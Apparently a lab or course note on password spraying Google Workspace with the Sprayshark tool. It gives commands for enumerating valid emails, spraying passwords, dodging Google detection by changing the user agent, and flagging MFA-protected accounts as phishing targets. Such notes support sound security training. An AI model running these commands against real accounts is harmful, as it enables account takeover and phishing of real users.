Skip to content

Password Spraying

Sprayshark

  • password sprayer for G-suite
    • create a headless chrome session against accounts.google.com, enters email, parses returned page text to check if email exists
    • will enter passwords if email exists and classify if user:pass is valid based on DOM (wrong password, or MFA screen, or login)

Increasing probability of success

  • using AWS IAM instead of federation is generally weak
    • azure and gcp are stronger against password spraying'
  • eg: when using sprayshark, the user agent can be caught by Google.
  • Change the user-agent and start the attack:
    • sprayshark enum -U emails.txt --timeout 360 --chrome-user-agent "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
  • Sprayshark also captures screenshots when running user enum

ID Valid Emails

  • rm ~/.sprayshark.db;
  • sprayshark enum -U emails.txt
    • ![[Attachments/Pasted image 20260304153205.png]]
    • If there is a timeout, google is blocking us

Password Spraying

  • sprayshark spray -u janes@shopgigantic.com -p 'W3lc0m3!'
    • ![[Attachments/Pasted image 20260304153304.png]]

Identifying MFA

  • sprayshark spray -u rohita@shopgigantic.com -P passwords.txt --timeout 360 --chrome-user-agent "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
    • It will return [CREDENTIALS found with MFA]
    • ![[Attachments/Pasted image 20260304153609.png]]
  • we can try phishing these users